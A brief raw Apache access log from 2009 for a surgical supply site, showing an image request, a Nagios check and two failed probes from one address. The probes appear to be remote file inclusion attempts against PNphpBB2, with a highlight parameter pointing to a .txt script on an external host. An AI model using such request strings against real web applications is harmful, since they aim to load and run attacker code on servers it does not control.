70.146.35.145 - - [28/Jun/2009:07:29:20 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
216.246.98.115 - - [28/Jun/2009:07:32:41 -0400] "GET /logs/access_log.Q109061000//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:07:32:44 -0400] "GET /logs/access_log.Q109052100//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:07:32:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
